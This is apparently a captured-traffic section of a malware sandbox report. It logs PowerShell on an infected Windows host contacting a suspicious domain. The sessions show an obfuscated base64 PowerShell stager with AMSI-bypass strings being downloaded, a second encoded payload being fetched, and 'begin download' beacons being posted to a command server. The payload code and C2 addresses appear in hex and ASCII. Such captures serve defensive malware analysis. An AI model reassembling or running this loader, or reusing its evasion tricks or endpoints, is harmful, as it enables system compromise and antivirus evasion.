                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=26135&sent=2779&recv=1220&lost=0&retrans=0&sent_bytes=2525494&recv_bytes=135936&delivery_rate=662517&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Date: Fri, 08 Nov 2024 09:42:55 GMT
                                                                                  Content-Length: 4852
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  4192.168.11.2049743206.206.126.2528008
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 8, 2024 10:42:57.975765944 CET168OUTGET /client/ws HTTP/1.1
                                                                                  Host: 206.206.126.252:8008
                                                                                  Connection: Upgrade
                                                                                  Upgrade: websocket
                                                                                  Sec-WebSocket-Key: 2u8wHEz9rUuF7BlOMAv9YQ==
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Nov 8, 2024 10:42:58.359704018 CET1289INHTTP/1.1 404 Not Found
                                                                                  Cache-Control: private
                                                                                  Upgrade: websocket
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Server: Microsoft-IIS/10.0
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sb0uUrAzXFQ6BT11I%2BKVuXPhI91dIJ6EjIrOSTbZckK5Y9DFqlAuWOQAYxzoeDS%2FlKj%2FoJkmF0UNsmqVoh7avU4HAP%2BTLcgbhR8vV00Jx4XEy%2B54wZTrIJ6yE0i2WUc9k4IjwPJgcZl%2F"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  CF-RAY: 8df49db56f27cdf1-SIN
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7916&sent=311&recv=199&lost=0&retrans=0&sent_bytes=268689&recv_bytes=24006&delivery_rate=6239316&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Date: Fri, 08 Nov 2024 09:42:57 GMT
                                                                                  Content-Length: 4852
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pr


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.11.2049714104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:40:50 UTC166OUTGET /KQ HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Connection: Keep-Alive
                                                                                  2024-11-08 09:40:50 UTC968INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:40:50 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 6426
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSe4xwCFnhLW5a7X0iregGuGNXi1dXLo%2FE3qbWA4O%2F6vIAx8iHR4vO5KtIjm%2F9Gb9Qywhkxmar9F8E0tj10e9EhJGVQNdGAZNiueZl3ZNjemQKRjnz%2F%2B8OShyHyM%2Bt0hiACfD4ceeWwc"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1034&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=551&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49a96db548c8a-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=104220&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=780&delivery_rate=35519&cwnd=241&unsent_bytes=0&cid=60efb3e3539ea919&ts=822&x=0"
                                                                                  2024-11-08 09:40:50 UTC401INData Raw: 24 64 79 69 6a 78 71 70 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 4e 57 4d 7a 55 6d 78 69 55 7a 56 57 59 32 31 73 5a 45 39 71 63 45 5a 6a 4d 6b 35 6f 59 30 64 57 52 56 6c 59 55 6d 68 56 4d 31 4a 35 59 56 63 31 62 6b 74 44 53 6a 46 69 62 58 52 31 59 6a 4e 6b 64 55 39 70 53 57 64 4c 65 55 46 72 57 48 6b 31 52 6d 56 48 54 6d 78 6a 53 46 4a 77 59 6a 49 30 64 56 52 58 56 6e 70 6a 4d 6b 5a 75 57 6c 4e 72 5a 32 5a 55 63 30 35 44 61 56 49 77 53 55 51 77 5a 30 74 46 5a 47 78 6b 51 7a 46 45 59 56 63 78 53 6d 4a 75 54 6a 42 5a 56 7a 56 71 57 6c 4e 43 57 47 46 58 4e 48 70 4e 62 44
                                                                                  Data Ascii: $dyijxqp=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("NWMzUmxiUzVWY21sZE9qcEZjMk5oY0dWRVlYUmhVM1J5YVc1bktDSjFibXR1YjNkdU9pSWdLeUFrWHk1RmVHTmxjSFJwYjI0dVRXVnpjMkZuWlNrZ2ZUc05DaVIwSUQwZ0tFZGxkQzFEYVcxSmJuTjBZVzVqWlNCWGFXNHpNbD
                                                                                  2024-11-08 09:40:50 UTC1369INData Raw: 59 6c 64 57 64 57 52 47 4d 44 5a 50 62 45 4a 35 59 6a 4a 4f 62 47 4d 7a 54 6e 5a 6a 61 30 35 32 5a 46 63 31 4d 45 39 33 4d 45 74 4b 52 31 46 6e 55 46 4e 42 62 31 49 79 56 6a 42 4d 56 6b 4a 35 59 6a 4a 4f 62 47 4d 7a 54 57 64 6d 51 30 4a 4f 57 6c 64 47 65 6d 52 59 53 6d 78 4d 56 54 6c 70 59 57 31 57 61 6d 52 44 61 33 56 52 4d 6a 6b 78 59 6d 35 52 4e 30 52 52 62 32 74 61 55 30 45 35 53 55 5a 30 56 47 56 59 54 6a 42 61 56 7a 42 31 56 6c 68 4b 63 46 68 55 62 7a 5a 53 57 45 35 71 57 56 68 43 62 46 4a 48 52 6a 42 5a 56 6b 34 77 59 32 31 73 64 56 70 35 61 47 4a 53 56 7a 55 79 59 56 68 4b 64 6d 4a 74 4d 57 78 69 62 6c 4a 6b 54 32 70 77 56 6d 4d 79 56 6e 6c 55 62 55 5a 30 57 6c 4e 72 4e 30 52 52 62 32 74 6b 57 45 70 7a 53 55 51 77 5a 30 6c 74 61 44 42 6b 53 45 4a
                                                                                  Data Ascii: YldWdWRGMDZPbEJ5YjJObGMzTnZja052ZFc1ME93MEtKR1FnUFNBb1IyVjBMVkJ5YjJObGMzTWdmQ0JOWldGemRYSmxMVTlpYW1WamRDa3VRMjkxYm5RN0RRb2taU0E5SUZ0VGVYTjBaVzB1VlhKcFhUbzZSWE5qWVhCbFJHRjBZVk4wY21sdVp5aGJSVzUyYVhKdmJtMWxiblJkT2pwVmMyVnlUbUZ0WlNrN0RRb2tkWEpzSUQwZ0ltaDBkSEJ
                                                                                  2024-11-08 09:40:50 UTC1369INData Raw: 6e 56 5a 4d 6a 6c 72 59 56 63 31 62 6c 68 55 62 7a 5a 57 56 6c 4a 48 54 30 4d 31 53 46 70 59 55 6c 52 6b 53 45 70 77 59 6d 31 6a 62 30 70 48 53 6a 56 6b 52 31 5a 43 59 32 35 4b 61 47 56 54 61 33 42 45 55 57 38 39 22 29 29 3b 0a 24 72 6f 76 6b 65 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 53 6b 64 46 5a 31 42 54 51 57 6c 6b 56 7a 56 79 59 6d 30 35 4d 32 4a 70 53 54 64 4a 51 54 42 4c 5a 45 68 4b 4e 55 6c 49 63 32 64 4b 52 30 56 6e 55 46 4e 43 59 6c 55 7a 62 48 70 6b 52 31 5a 30 54 47 78 57 65 57 46 57 4d 44 5a 50 61 31 5a 36 57 54 4a 47 64 31 70 56 55 6d 68 6b 52 30 5a 55
                                                                                  Data Ascii: nVZMjlrYVc1blhUbzZWVlJHT0M1SFpYUlRkSEpwYm1jb0pHSjVkR1ZCY25KaGVTa3BEUW89"));$rovke=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkdFZ1BTQWlkVzVyYm05M2JpSTdJQTBLZEhKNUlIc2dKR0VnUFNCYlUzbHpkR1Z0TGxWeWFWMDZPa1Z6WTJGd1pVUmhkR0ZU
                                                                                  2024-11-08 09:40:50 UTC1369INData Raw: 47 4a 71 54 58 6c 4a 53 48 4e 6e 56 7a 42 53 63 32 4a 46 62 48 52 6a 52 7a 6c 35 5a 45 4e 6e 61 57 52 59 54 6d 78 6a 61 6b 31 35 54 47 31 53 63 32 4a 44 53 58 42 59 55 30 4a 33 5a 46 64 4b 63 32 46 58 54 57 64 6a 4d 31 4a 6f 5a 45 64 73 61 6b 6c 48 56 6a 52 6b 22 29 29 3b 0a 24 76 77 61 65 73 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 6d 78 70 59 79 78 54 64 47 46 30 61 57 4d 3d 22 29 29 3b 0a 24 63 6b 72 61 72 73 6a 69 79 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e
                                                                                  Data Ascii: GJqTXlJSHNnVzBSc2JFbHRjRzl5ZENnaWRYTmxjak15TG1Sc2JDSXBYU0J3ZFdKc2FXTWdjM1JoZEdsaklHVjRk"));$vwaes=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YmxpYyxTdGF0aWM="));$ckrarsjiy=[System.Text.Encoding]::ASCII.GetString([System.
                                                                                  2024-11-08 09:40:50 UTC516INData Raw: 56 74 4c 6b 52 70 59 57 64 75 62 33 4d 3d 22 29 29 3b 0a 24 6c 6d 63 6e 61 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 64 47 56 74 4c 6b 4e 76 63 6d 55 3d 22 29 29 3b 0a 24 73 73 7a 6a 64 71 68 79 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 22 29 29 3b 0a 24 71 72 75 71 7a 64 6d 6e 68 71 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49
                                                                                  Data Ascii: VtLkRpYWdub3M="));$lmcna=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLkNvcmU="));$sszjdqhy=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));$qruqzdmnhq=[System.Text.Encoding]::ASCII
                                                                                  2024-11-08 09:40:51 UTC1369INData Raw: 6c 5a 41 3d 3d 22 29 29 3b 0a 24 72 70 64 6a 71 6c 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 57 31 7a 61 55 6c 75 61 51 3d 3d 22 29 29 3b 0a 24 68 74 76 65 79 73 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 5a 57 30 75 54 57 46 75 59 57 64 6c 62 57 56 75 64 43 35 42 64 58 52 76 62 57 46 30 61 57 39 75 4c 6b 46 74 63 32 6c 56 64 47 6c 73 63 77 3d 3d 22 29 29 3b 0a 24 68 6f 6f 75 7a 69
                                                                                  Data Ascii: lZA=="));$rpdjql=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW1zaUluaQ=="));$htveys=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscw=="));$hoouzi
                                                                                  2024-11-08 09:40:51 UTC33INData Raw: 36 34 53 74 72 69 6e 67 28 28 24 72 6f 76 6b 65 20 2b 20 24 64 79 69 6a 78 71 70 29 29 29 29 3b 0a
                                                                                  Data Ascii: 64String(($rovke + $dyijxqp))));


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.11.2049715104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:40:52 UTC374OUTGET /file3/f40ab6a53a650d71af6d58782cf944eb3bbe65ce71f776cf45ebb488d0de6ad04dd9da4d673c732c8da198bf177de048d268178a0b39d4d5ff3cc9ba1dea46b48fd52f3a309fb889c0f8b0d1fe17b088b9e4ad19e2c0ae1fc28a6029fc7cf0ec/Windows%20Defender/16/16/user/197 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  2024-11-08 09:40:53 UTC1048INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:40:53 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2888
                                                                                  Connection: close
                                                                                  content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RFZj7CKZTMTmokUApYvN1uhS9n1Piv9O4g4rzEe5J2pJ51bHLIa1UqTQfOR%2FK6EotkEF2rEyC1zmOCtuUQNjok1SGdPV3FCUa869h8UGJ5gs8AryGCxxZq2dI%2F1b4sOxGsL1iDb%2BgM0A"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6745&sent=10&recv=10&lost=0&retrans=0&sent_bytes=7937&recv_bytes=2809&delivery_rate=6465899&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49aa6d9a443c1-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=103258&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1012&delivery_rate=37474&cwnd=252&unsent_bytes=0&cid=64332d3fdcbd0fb5&ts=806&x=0"
                                                                                  2024-11-08 09:40:53 UTC321INData Raw: 25 60 68 6f 71 64 74 68 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 4c 44 34 49 53 59 65 4e 60 6c 4c 30 55 55 4b 4b 65 30 71 44 57 59 69 5b 60 6c 62 76 55 6b 4b 52 60 54 30 54 50 55 57 4f 57 44 31 76 55 57 65 4f 64 54 38 54 5b 7b 53 5b 4c 6a 71 70 55 56 71 73 4c 44 38 44 55 59 6d 4e 57 31 6d 37 56 6a 53 57 64 44 30 44 5b 46 69 5b 60 6d 71 70 55 57 53 4b 64 47 6d 37 57 55 43 4f 64 6c 75 37 56 57 53 52 60 31 30 54 53 55 47 4f 57 30 54 79 55 30 65 47 64 44 34 37 57 55 4f 5b 57 46 69 72 56 6a 53 47 4c 57 71 54 60 7b 4f 60 53 46 4f 34 55 30 65 4f 4f 57 71 59 52 59 65 4f 57
                                                                                  Data Ascii: %`hoqdthq<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#LD4ISYeN`lL0UUKKe0qDWYi[`lbvUkKR`T0TPUWOWD1vUWeOdT8T[{S[LjqpUVqsLD8DUYmNW1m7VjSWdD0D[Fi[`mqpUWSKdGm7WUCOdlu7VWSR`10TSUGOW0TyU0eGdD47WUO[WFirVjSGLWqT`{O`SFO4U0eOOWqYRYeOW
                                                                                  2024-11-08 09:40:53 UTC1369INData Raw: 79 56 59 71 47 4f 44 30 49 53 6c 69 51 57 46 62 7b 55 31 53 4e 60 6a 30 59 56 55 53 51 57 30 47 34 55 6d 53 73 64 6a 34 37 50 6c 79 4e 4c 6d 6a 78 55 30 65 56 60 6a 30 70 55 55 43 4f 57 46 4f 34 56 57 53 46 63 57 6d 37 53 6c 75 60 53 47 6d 32 56 56 30 5b 60 54 38 32 4c 44 75 4a 53 31 34 33 5b 47 62 30 4c 44 6d 44 4c 46 65 4f 57 44 47 32 55 32 62 76 52 31 53 53 63 31 34 45 5b 7b 43 4d 56 6c 34 56 65 57 6a 7b 54 6f 43 68 4c 6b 53 6f 57 55 4b 56 65 57 71 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 77 52 54 5b 31 54 57 54 76 4e 56 6d 69 63 57 5b 70 5b 44 58 76 5b 31 71 49 64 49 5b 60 4c 45 47 37 56 6f 6d 43 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 60 6a 6d 47 55 6f 5b 68 63 6d 71 72 58 33 34 53 5b 30 6d 75 4e 56 75 6d 54 31
                                                                                  Data Ascii: yVYqGOD0ISliQWFb{U1SN`j0YVUSQW0G4UmSsdj47PlyNLmjxU0eV`j0pUUCOWFO4VWSFcWm7Slu`SGm2VV0[`T82LDuJS143[Gb0LDmDLFeOWDG2U2bvR1SSc14E[{CMVl4VeWj{ToChLkSoWUKVeWqEPkeDTV8oRTOC[3OISom[W{CwRT[1TWTvNVmicW[p[DXv[1qIdI[`LEG7VomCbDSSc14E`TGoRTOC`jmGUo[hcmqrX34S[0muNVumT1
                                                                                  2024-11-08 09:40:53 UTC1198INData Raw: 50 56 65 4b 50 55 43 4d 5b 6d 44 76 52 31 53 53 62 45 4f 69 53 33 79 7b 56 6d 4f 6f 60 30 6a 78 4e 55 47 68 63 6d 47 6f 55 47 65 6a 4c 44 6d 44 50 59 43 44 54 59 40 32 53 47 47 77 52 6a 53 53 63 31 71 6a 52 44 6e 30 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 57 47 71 59 4f 56 75 4b 50 31 71 71 56 6d 65 6a 62 46 4b 71 50 6c 75 68 4c 33 53 30 58 6a 62 34 60 47 71 45 50 56 75 6a 56 44 71 76 52 56 71 7b 55 6a 4f 6f 60 31 71 4a 53 31 34 33 58 6c 34 52 63 46 4b 74 54 56 65 50 54 31 4b 4a 58 6c 34 60 65 6c 44 78 57 59 53 56 4c 6d 5b 71 57 56 30 56 64 46 53 59 57 6f 71 6a 50 31 47 31 57 6d 69 4a 62 44 6d 45 54 6b 47 6b 63 56 75 6f 55 47 5b 56 64 6d 71 57 52 6c 69 6b 4c 6c 79 70 57 54 65 46 64 56 4c 78 63 49 57 60 64 6f 4f 4e 50 33 6d 43 5b 31 6d
                                                                                  Data Ascii: PVeKPUCM[mDvR1SSbEOiS3y{VmOo`0jxNUGhcmGoUGejLDmDPYCDTY@2SGGwRjSSc1qjRDn0[YbvR1mEPVeKP1GoRTOBWGqYOVuKP1qqVmejbFKqPluhL3S0Xjb4`GqEPVujVDqvRVq{UjOo`1qJS143Xl4RcFKtTVePT1KJXl4`elDxWYSVLm[qWV0VdFSYWoqjP1G1WmiJbDmETkGkcVuoUG[VdmqWRlikLlypWTeFdVLxcIW`doONP3mC[1m


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.11.2049716104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:40:53 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211831a2f0a5c8263bf9f8f811f60dc99699 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 308
                                                                                  2024-11-08 09:40:53 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 63 36 61 65 36 37 35 36 33 34 36 63 33 38 39 36 39 32 32 33 62 61 32 66 38 66 63 37 63 34 30 37 33 38 62 36 65 39 37 35 30 39 62 65 34 34 61 30 36 37 39 33 62 30 64 35 31 62 38 34 37 64 62 31 30 39 31 33 34 31 63 32 39 38 38 63 62 63 32 39 34 38 33 32 35 62 33 64 35 31 30 37 61 62 36 63 31 32 31 63 35 34 33 39 33 61 34 64 31 31 35 31 65 35 39 61 31 37 35 37 61 38 65 64 31 35 65 39 37 64 37 32 39 63 39 65 62 30 31 30 37 33 34 65 31 64 39 36 34 33 31 34 34 32 30 38 66 38 64 34 38 31 64 39 37 65 61 31 33 30 35 30 62 61 31 33 35 63 31 38 30 61 61 39 38 37 38 33 63 31 66 38 39 64 32 35
                                                                                  Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db1091341c2988cbc2948325b3d5107ab6c121c54393a4d1151e59a1757a8ed15e97d729c9eb010734e1d9643144208f8d481d97ea13050ba135c180aa98783c1f89d25
                                                                                  2024-11-08 09:40:54 UTC933INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:40:54 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Blxg8bvsgZgp6Yi%2FAS2%2FvVs3vswazFRFiNQ95S9gaGjBFOritc9VOIkhhpIM7ZAQ2wfGnRFjhLVE9eMcxkCLYKSJwvZGUk5W1r0zRgx6WvFMKIiZ32XYkwYCnwjrP4VRgFLD8rRcC4HC"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4906&sent=15&recv=15&lost=0&retrans=0&sent_bytes=11666&recv_bytes=3911&delivery_rate=6465899&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49aae481043ac-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=108706&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1258&delivery_rate=35717&cwnd=252&unsent_bytes=0&cid=07b8d7031d051f99&ts=818&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.11.2049717104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
